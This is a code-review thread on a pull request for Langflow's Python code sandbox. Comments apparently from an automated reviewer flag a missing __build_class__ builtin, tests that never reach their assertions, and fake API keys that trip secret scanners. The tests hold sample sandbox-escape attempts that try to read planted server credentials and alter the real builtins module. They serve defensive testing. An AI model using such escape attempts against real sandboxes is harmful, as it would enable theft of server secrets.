Ensure imports are added (contextlib) and update all occurrences consistently
without changing runtime behavior.
| essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"] | ||
| for name in essential_underscore_builtins: | ||
| if hasattr(builtins, name): | ||
| isolated_builtins[name] = getattr(builtins, name) | ||
|
|
||
| # Critical: Make __builtins__ point to this isolated copy, not the real one | ||
| # This prevents code from accessing the real builtins module | ||
| isolated_builtins["__builtins__"] = isolated_builtins.copy() | ||
|
|
||
| # Prevent access to the real builtins module | ||
| # If code tries to import builtins, they get our isolated version | ||
| class IsolatedBuiltinsModule: | ||
| """Fake builtins module that prevents escaping.""" | ||
|
|
||
| def __getattr__(self, name: str) -> Any: | ||
| # Block dangerous builtins unless explicitly allowed | ||
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | ||
| raise SecurityViolation( | ||
| f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | ||
| ) | ||
| if name == "__builtins__": | ||
| return isolated_builtins | ||
| if hasattr(builtins, name): | ||
| return getattr(builtins, name) | ||
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | ||
|
|
||
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | ||
|
|
||
| return isolated_builtins |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Include __build_class__ in isolated builtins to support class definitions inside the sandbox
create_isolated_builtins currently copies only non-underscore names from builtins and then manually whitelists a few underscored ones ("__name__", "__doc__", etc.). It does not include __build_class__, which Python uses whenever a class statement is executed.
Consequence: executing code that actually runs a class definition within the sandbox (e.g., top-level class Foo: ... in code passed to execute_in_sandbox) will fail with NameError: __build_class__ is not defined, even when the code is otherwise totally benign. That’s surprising for callers and will make it hard to sandbox any code that defines classes.
You should add __build_class__ to the essential underscore builtins so it’s available in the sandbox:
- essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+ essential_underscore_builtins = [
+ "__name__",
+ "__doc__",
+ "__package__",
+ "__loader__",
+ "__spec__",
+ "__build_class__", # Needed for executing class definitions
+ ]This keeps class definitions functional inside the sandbox without weakening your security guarantees.
Also applies to: 179-236
🏁 Script executed:
#!/bin/bash
# Demonstrate the need for __build_class__ when executing a class definition in the sandbox.
python - << 'PY'
from lfx.custom.sandbox import create_isolated_builtins, execute_in_sandbox
import ast
code = "class Foo:\n pass\n"
code_obj = compile(code, "<sandbox-test>", "exec")
globals_ctx = {}
try:
execute_in_sandbox(code_obj, globals_ctx)
print("Executed class definition successfully")
except Exception as e:
print("Exception during sandboxed class definition:", type(e).__name__, e)
PYLength of output: 115
---
🏁 Script executed:
```shell
#!/bin/bash
# Locate the sandbox.py file
fd -type f -name "sandbox.py"
Length of output: 170
🏁 Script executed:
#!/bin/bash
# Examine the create_isolated_builtins function and surrounding context
cat src/lfx/src/lfx/custom/sandbox.py | head -200Length of output: 7266
🏁 Script executed:
#!/bin/bash
# Search for any references to __build_class__ in the sandbox.py file
rg -n "__build_class__" src/lfx/src/lfx/custom/sandbox.pyLength of output: 0
🏁 Script executed:
#!/bin/bash
# Search for essential_underscore_builtins in the file
rg -n "essential_underscore_builtins" src/lfx/src/lfx/custom/sandbox.py -A 5Length of output: 419
---
🏁 Script executed:
```shell
#!/bin/bash
# Examine lines 150-250 to see execute_in_sandbox and the second location (179-236)
sed -n '150,250p' src/lfx/src/lfx/custom/sandbox.py
Length of output: 3954
🏁 Script executed:
#!/bin/bash
# Search for all uses of execute_in_sandbox to understand the impact
rg -n "execute_in_sandbox" src/lfx/src/lfx/custom/sandbox.py -B 2 -A 2Length of output: 155
Add __build_class__ to essential underscore builtins to support class definitions inside the sandbox
The verification confirms the issue: __build_class__ is missing from the essential_underscore_builtins list at line 111, and Python requires this builtin whenever a class statement executes. Any code attempt to define a class in the sandbox will fail with NameError: __build_class__ is not defined.
The suggested fix is correct and necessary:
- essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"]
+ essential_underscore_builtins = [
+ "__name__",
+ "__doc__",
+ "__package__",
+ "__loader__",
+ "__spec__",
+ "__build_class__", # Needed for executing class definitions
+ ]Apply this change at line 111 in src/lfx/src/lfx/custom/sandbox.py.
📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| essential_underscore_builtins = ["__name__", "__doc__", "__package__", "__loader__", "__spec__"] | |
| for name in essential_underscore_builtins: | |
| if hasattr(builtins, name): | |
| isolated_builtins[name] = getattr(builtins, name) | |
| # Critical: Make __builtins__ point to this isolated copy, not the real one | |
| # This prevents code from accessing the real builtins module | |
| isolated_builtins["__builtins__"] = isolated_builtins.copy() | |
| # Prevent access to the real builtins module | |
| # If code tries to import builtins, they get our isolated version | |
| class IsolatedBuiltinsModule: | |
| """Fake builtins module that prevents escaping.""" | |
| def __getattr__(self, name: str) -> Any: | |
| # Block dangerous builtins unless explicitly allowed | |
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | |
| raise SecurityViolation( | |
| f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | |
| ) | |
| if name == "__builtins__": | |
| return isolated_builtins | |
| if hasattr(builtins, name): | |
| return getattr(builtins, name) | |
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | |
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | |
| return isolated_builtins | |
| essential_underscore_builtins = [ | |
| "__name__", | |
| "__doc__", | |
| "__package__", | |
| "__loader__", | |
| "__spec__", | |
| "__build_class__", # Needed for executing class definitions | |
| ] | |
| for name in essential_underscore_builtins: | |
| if hasattr(builtins, name): | |
| isolated_builtins[name] = getattr(builtins, name) | |
| # Critical: Make __builtins__ point to this isolated copy, not the real one | |
| # This prevents code from accessing the real builtins module | |
| isolated_builtins["__builtins__"] = isolated_builtins.copy() | |
| # Prevent access to the real builtins module | |
| # If code tries to import builtins, they get our isolated version | |
| class IsolatedBuiltinsModule: | |
| """Fake builtins module that prevents escaping.""" | |
| def __getattr__(self, name: str) -> Any: | |
| # Block dangerous builtins unless explicitly allowed | |
| if not ALLOW_DANGEROUS_CODE and name in BLOCKED_BUILTINS: | |
| raise SecurityViolation( | |
| f"Dangerous builtin '{name}' is blocked. Set LANGFLOW_ALLOW_DANGEROUS_CODE_VALIDATION=true to allow." | |
| ) | |
| if name == "__builtins__": | |
| return isolated_builtins | |
| if hasattr(builtins, name): | |
| return getattr(builtins, name) | |
| raise AttributeError(f"module 'builtins' has no attribute '{name}'") | |
| isolated_builtins["builtins"] = IsolatedBuiltinsModule() | |
| return isolated_builtins |
🧰 Tools
🪛 GitHub Check: Ruff Style Check (3.13)
[failure] 135-135: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:135:34: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 135-135: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:135:19: TRY003 Avoid specifying long messages outside the exception class
[failure] 129-129: Ruff (E501)
src/lfx/src/lfx/custom/sandbox.py:129:121: E501 Line too long (121 > 120)
[failure] 129-129: Ruff (EM102)
src/lfx/src/lfx/custom/sandbox.py:129:21: EM102 Exception must not use an f-string literal, assign to variable first
[failure] 128-130: Ruff (TRY003)
src/lfx/src/lfx/custom/sandbox.py:128:23: TRY003 Avoid specifying long messages outside the exception class
🤖 Prompt for AI Agents
In src/lfx/src/lfx/custom/sandbox.py around lines 111 to 139, the list
essential_underscore_builtins is missing "__build_class__", causing any class
definition inside the sandbox to raise NameError; add "__build_class__" to that
list so the sandbox provides the class-construction builtin, ensuring class
statements work correctly while keeping the rest of the isolated builtins
behavior unchanged.
| def test_sandbox_cannot_access_parent_globals(): | ||
| """Test that sandboxed code cannot access parent function's globals.""" | ||
| # Set a variable in the parent scope | ||
| parent_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access parent_var from parent scope | ||
| # If isolation were broken, this would work | ||
| return parent_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| # Execute in sandbox | ||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Try to call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because parent_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_modify_parent_globals(): | ||
| """Test that sandboxed code cannot modify parent scope's globals.""" | ||
| parent_dict = {"value": "original"} | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to modify parent_dict | ||
| # If isolation were broken, this would modify the real parent_dict | ||
| parent_dict["value"] = "modified" | ||
| return parent_dict["value"] | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function - should fail because parent_dict is not accessible | ||
| test_func = exec_globals["test"] | ||
|
|
||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| # Verify parent_dict was not modified | ||
| assert parent_dict["value"] == "original" | ||
|
|
||
|
|
||
| def test_sandbox_isolated_builtins(): | ||
| """Test that sandbox uses isolated builtins, not real ones.""" | ||
| # Create a marker in real builtins (simulating server state) | ||
| import builtins | ||
|
|
||
| original_builtins_len = len(dir(builtins)) | ||
|
|
||
| code = """ | ||
| def test(): | ||
| import builtins | ||
| # Try to access real builtins | ||
| # If isolation were broken, we could modify real builtins | ||
| builtins.ESCAPE_TEST = "should_not_exist" | ||
| return hasattr(builtins, 'ESCAPE_TEST') | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
| result = test_func() | ||
|
|
||
| # Should return False or True but not affect real builtins | ||
| # Verify real builtins wasn't modified | ||
| assert not hasattr(builtins, "ESCAPE_TEST") | ||
| assert len(dir(builtins)) == original_builtins_len | ||
|
|
||
|
|
||
| def test_sandbox_fresh_namespace_per_execution(): | ||
| """Test that each execution gets a fresh isolated namespace.""" | ||
| code1 = """ | ||
| GLOBAL_VAR = "first_execution" | ||
| def test(): | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj1 = compile(code1, "<test>", "exec") | ||
| exec_globals1 = {} | ||
| execute_in_sandbox(code_obj1, exec_globals1) | ||
|
|
||
| # Second execution with different code | ||
| code2 = """ | ||
| def test(): | ||
| # Try to access GLOBAL_VAR from previous execution | ||
| # If isolation were broken, this would work | ||
| return GLOBAL_VAR | ||
| """ | ||
| code_obj2 = compile(code2, "<test>", "exec") | ||
| exec_globals2 = {} | ||
| execute_in_sandbox(code_obj2, exec_globals2) | ||
|
|
||
| # Should raise NameError because GLOBAL_VAR doesn't exist in this execution | ||
| test_func = exec_globals2["test"] | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
|
|
||
| def test_sandbox_cannot_access_frame_locals(): | ||
| """Test that sandboxed code cannot access caller's local variables.""" | ||
|
|
||
| def caller_function(): | ||
| local_var = "should_not_be_accessible" | ||
|
|
||
| code = """ | ||
| def test(): | ||
| # Try to access local_var from caller | ||
| # If isolation were broken, this would work | ||
| return local_var | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # Should raise NameError because local_var is not accessible | ||
| with pytest.raises(NameError): | ||
| test_func() | ||
|
|
||
| caller_function() | ||
|
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that
Across these tests you call:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, updates it with exec_globals, and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.
You likely want one of:
- Keep sandbox one‑way (safer) and update tests to assert on errors from
execute_in_sandboxitself, or to evaluate access attempts at module level inside the sandboxed code (soexecute_in_sandboxraises theNameError/SecurityViolationyou check), rather than trying to call sandboxed functions viaexec_globals; or - Change
execute_in_sandbox’s contract so it exports selected symbols (e.g., top‑level defs) back intoexec_globalsafter execution, then yourexec_globals["test"]pattern would work, but that does loosen the API surface of the sandbox.
Right now, as written, these tests won’t be validating isolation properties but will instead fail on lookup of "test".
Also applies to: 179-220
🏁 Script executed:
#!/bin/bash
# Verify current execute_in_sandbox behavior with respect to exec_globals.
python - << 'PY'
from lfx.custom.sandbox import execute_in_sandbox
import ast
code = "def test():\n return 42\n"
code_obj = compile(code, "<test>", "exec")
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
print("exec_globals keys after execute_in_sandbox:", list(exec_globals.keys()))
PYLength of output: 115
---
🏁 Script executed:
```shell
#!/bin/bash
# Locate execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type=py
Length of output: 114
🏁 Script executed:
#!/bin/bash
# Find sandbox-related module files
fd -e py "sandbox" --type fLength of output: 136
🏁 Script executed:
#!/bin/bash
# Read execute_in_sandbox implementation
cat src/lfx/src/lfx/custom/sandbox.py | sed -n '179,250p'Length of output: 2584
🏁 Script executed:
#!/bin/bash
# Check if test_sandbox_security.py has similar patterns or different approach
head -100 src/lfx/tests/unit/custom/test_sandbox_security.pyLength of output: 3707
Sandbox tests assume exec_globals is mutated, but execute_in_sandbox does not currently do that
Across these tests you call:
exec_globals = {}
execute_in_sandbox(code_obj, exec_globals)
test_func = exec_globals["test"]and then assert behavior by calling test_func() (e.g., expecting NameError). However, execute_in_sandbox creates its own sandbox_globals dict, reads from exec_globals via update(), and never writes symbols back into exec_globals. As a result exec_globals stays empty and exec_globals["test"] will raise KeyError before any of the pytest.raises(...) blocks are exercised.
You likely want one of:
- Keep sandbox one‑way (safer) and update tests to assert on errors from
execute_in_sandboxitself, or to evaluate access attempts at module level inside the sandboxed code (soexecute_in_sandboxraises theNameError/SecurityViolationyou check), rather than trying to call sandboxed functions viaexec_globals; or - Change
execute_in_sandbox's contract so it exports selected symbols (e.g., top‑level defs) back intoexec_globalsafter execution, then yourexec_globals["test"]pattern would work, but that does loosen the API surface of the sandbox.
Right now, as written, these tests won't be validating isolation properties but will instead fail on lookup of "test".
| server_api_key = "sk-secret-key-12345" | ||
| server_db_password = "db_password_secret" | ||
| server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"} |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Fake API keys will trigger gitleaks and other secret scanners
The hard‑coded strings like:
server_api_key = "sk-secret-key-12345"(Line 29)self.api_key = "sk-secret-12345"(Line 63)
match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.
Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:
- server_api_key = "sk-secret-key-12345"
+ server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
- self.api_key = "sk-secret-12345"
+ self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"or add explicit allowlist annotations consistent with your secret‑scanning configuration.
Also applies to: 63-66
🧰 Tools
🪛 Gitleaks (8.29.0)
[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.
(generic-api-key)
🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.
| code = """ | ||
| def test(): | ||
| # Try to access server's Python variables containing secrets | ||
| # If isolation is broken, these would be accessible | ||
| return server_api_key, server_db_password, server_config | ||
| """ | ||
| code_obj = compile(code, "<test>", "exec") | ||
| exec_globals = {} | ||
|
|
||
| execute_in_sandbox(code_obj, exec_globals) | ||
|
|
||
| # Call the function | ||
| test_func = exec_globals["test"] | ||
|
|
||
| # CRITICAL: Should raise NameError - server secrets are not accessible | ||
| # This is what prevents credential theft | ||
| with pytest.raises(NameError): | ||
| test_func() |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
🧩 Analysis chain
exec_globals["test"] never populated by execute_in_sandbox
All tests in this file follow the pattern:
exec_globals = {}execute_in_sandbox(code_obj, exec_globals)test_func = exec_globals["test"]with pytest.raises(NameError): test_func()
However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).
Two options:
- Adjust tests to assert on the exception raised by
execute_in_sandboxitself (and calltest()from within the code string), e.g.:
- code = """
-def test():
- # Try to access server's Python variables containing secrets
- # If isolation is broken, these would be accessible
- return server_api_key, server_db_password, server_config
-"""
+ code = """
+def test():
+ # Try to access server's Python variables containing secrets
+ # If isolation is broken, these would be accessible
+ return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
- code_obj = compile(code, "<test>", "exec")
- exec_globals = {}
-
- execute_in_sandbox(code_obj, exec_globals)
-
- # Call the function
- test_func = exec_globals["test"]
-
- # CRITICAL: Should raise NameError - server secrets are not accessible
- # This is what prevents credential theft
- with pytest.raises(NameError):
- test_func()
+ code_obj = compile(code, "<test>", "exec")
+ exec_globals = {}
+
+ # CRITICAL: Should raise NameError - server secrets are not accessible
+ # This is what prevents credential theft
+ with pytest.raises(NameError):
+ execute_in_sandbox(code_obj, exec_globals)- Or, if the intended contract is that sandboxed definitions are exported back into
exec_globals, updateexecute_in_sandboxto propagate selected names (e.g., functions) out of the internalsandbox_globalsintoexec_globals.
Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.
🏁 Script executed:
#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type pyLength of output: 114
🏁 Script executed:
#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2Length of output: 1022
🏁 Script executed:
#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.pyLength of output: 9640
🏁 Script executed:
#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;Length of output: 35
🏁 Script executed:
#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3Length of output: 12538
🏁 Script executed:
#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.pyLength of output: 2584
🏁 Script executed:
#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.pyLength of output: 8824
Tests fail with KeyError before asserting intended NameError behavior
The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.
This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.
Choose one solution:
- Move the function call into the code string so
NameErroris raised duringexecute_in_sandbox:
code = """
def test():
return server_api_key, server_db_password, server_config
test()
"""
with pytest.raises(NameError):
execute_in_sandbox(code_obj, exec_globals)- Update
execute_in_sandboxto propagate selected definitions (e.g., functions) back intoexec_globalsafter execution.
Summary by CodeRabbit
New Features
Security
✏️ Tip: You can customize this high-level summary in your review settings.